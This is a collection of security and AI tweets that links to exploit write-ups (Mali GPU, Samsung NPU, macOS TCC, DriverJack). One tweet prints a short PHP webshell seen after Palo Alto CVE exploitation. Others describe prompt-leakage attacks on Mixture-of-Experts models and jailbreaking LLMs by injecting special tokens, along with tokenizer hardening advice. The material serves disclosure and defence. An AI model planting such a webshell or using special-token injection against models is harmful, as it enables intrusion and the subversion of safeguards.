Your work tools in Claude are now available on mobile.
Explore Figma designs, create Canva slides, check Amplitude dashboards, all from your phone.
Give it a try: https://t.co/hwPB3zlk0w
Today at #AIforGood Impact Africa during @aiexpoafrica 2025 in Johannesburg, we launched the Innovate for Impact Report! Unveiled during the Innovate for Impact Awards, the report showcases inspiring #AI projects and individuals using technology to drive real-world change, responsibly and inclusively.
We are proud to recognize innovative projects, including :
🐘 Combating wildlife trade with AI
🏥 Expanding healthcare access through medical large models
🌊 Protecting marine ecosystems with GeoGPT
🌾 Empowering African farmers with AI solutions
🧠 Enhancing accessibility through on-device intelligence
💡 Advancing “Innovate for Impact” analysis and leadership in AI standards
Each of them highlights how #AI can be a force for good, empowering people, protecting the planet, and shaping a more sustainable future.
🌐Read the report now: https://t.co/K19oOzlVXV
Bypassing MTE with CVE-2025-0072
Article by @mmolgtm about exploiting a page use-after-free vulnerability in the ARM's Mali GPU driver in the code that manages userspace-mapped pages.
https://t.co/gLfxDrcIOB
📢 New security risk for Mixture-of-Experts (MoE)! 📢
@GoogleDeepMind research reveals a new kind of vulnerability that could leak user prompts in MoE models. Our "MoE Tiebreak Leakage" attack exploits the Expert Choice Routing strategy. https://t.co/DkCSW4ed4s
Actively #PaloAlto#Vulnerability CVE-2024-0012 (9.3) and CVE-2024-9474 (6.9) exploitation is in the wild.
Post-explotaition #Webshell example dropped. 😯
<?php $z="system";
if(${"_POST"}["b"]=="iUqPd")
{
$z(${"_POST"}["x"]);
};
https://t.co/oynymXs43b
Today I'm excited to share with you all that our security AI Agent called "Big Sleep" has found its first vulnerability in an open-source codebase! This has been a great collaborative effort between
@GoogleDeepMind and Google Project Zero.
https://t.co/mArCx7QXqC
CVE-2024-40801 in macOS allowed a sandboxed app to bypass TCC protections and access sensitive user data without requiring user permission.
This issue has since been fixed in macOS Sonoma 14.7 and macOS Sequoia 15.0.
PoC
https://t.co/HkE5Vja6if
CVE-2022-22265: Samsung NPU driver
An article by @javierprtd about exploiting a slab double-free in the Samsung's NPU driver via the Dirty Pagetable technique.
https://t.co/vTEjstwtMO
@karpathy Indeed! Our recent work exactly used these special tokens (</INST>, <|end_header_id|>, etc.) to efficiently jailbreak LLMs.
https://t.co/076H90r5dh
SQL injection-like attack on LLMs with special tokens
The decision by LLM tokenizers to parse special tokens in the input string (<s>, <|endoftext|>, etc.), while convenient looking, leads to footguns at best and LLM security vulnerabilities at worst, equivalent to SQL injection attacks.
!!! User input strings are untrusted data !!!
In SQL injection you can pwn bad code with e.g. the DROP TABLE attack. In LLMs we'll get the same issue, where bad code (very easy to mess up with current Tokenizer APIs and their defaults) will parse input string's special token descriptors as actual special tokens, mess up the input representations and drive the LLM out of distribution of chat templates.
Example with the current huggingface Llama 3 tokenizer defaults:
Two unintuitive things are happening at the same time:
1. The <|begin_of_text|> token (128000) was added to the front of the sequence.
2. The <|end_of_text|> token (128001) was parsed out of our string and the special token was inserted. Our text (which could have come from a user) is now possibly messing with the token protocol and taking the LLM out of distribution with undefined outcomes.
I recommend always tokenizing with two additional flags, disabling (1) with add_special_tokens=False and (2) with split_special_tokens=True, and adding the special tokens yourself in code. Both of these options are I think a bit confusingly named. For the chat model, I think you can also use the Chat Templates apply_chat_template.
With this we get something that looks more correct, and we see that <|end_of_text|> is now treated as any other string sequence, and is broken up by the underlying BPE tokenizer as any other string would be:
TLDR imo calls to encode/decode should never handle special tokens by parsing strings, I would deprecate this functionality entirely and forever. These should only be added explicitly and programmatically by separate code paths. In tiktoken, e.g. always use encode_ordinary. In huggingface, be safer with the flags above. At the very least, be aware of the issue and always visualize your tokens and test your code. I feel like this stuff is so subtle and poorly documented that I'd expect somewhere around 50% of the code out there to have bugs related to this issue right now.
Even ChatGPT does something weird here. At best it just deletes the tokens, at worst this is confusing the LLM in an undefined way, I don't really know happens under the hood, but ChatGPT can't repeat the string "<|endoftext|>" back to me:
Be careful out there.
Introducing ReSym (CCS'24): our binary analysis technique, an LLM+static analysis solution that recovers names, types, and layouts of variables and data structures from binaries https://t.co/7ln6lFfYnJ @danning_x, @i2huer, @NanJiang719, @XiangzheX XiangyuZhang #LLM4code#CCS#LLM
[RELEASE] Following the talk at DEF CON, I'm releasing all the POC projects associated with DriverJack. More info in the repos. For any additional info, hit me up ;)
- https://t.co/VmVpVtNkhD
- https://t.co/Cdzi5RBgVE
- https://t.co/RjN05qKeXg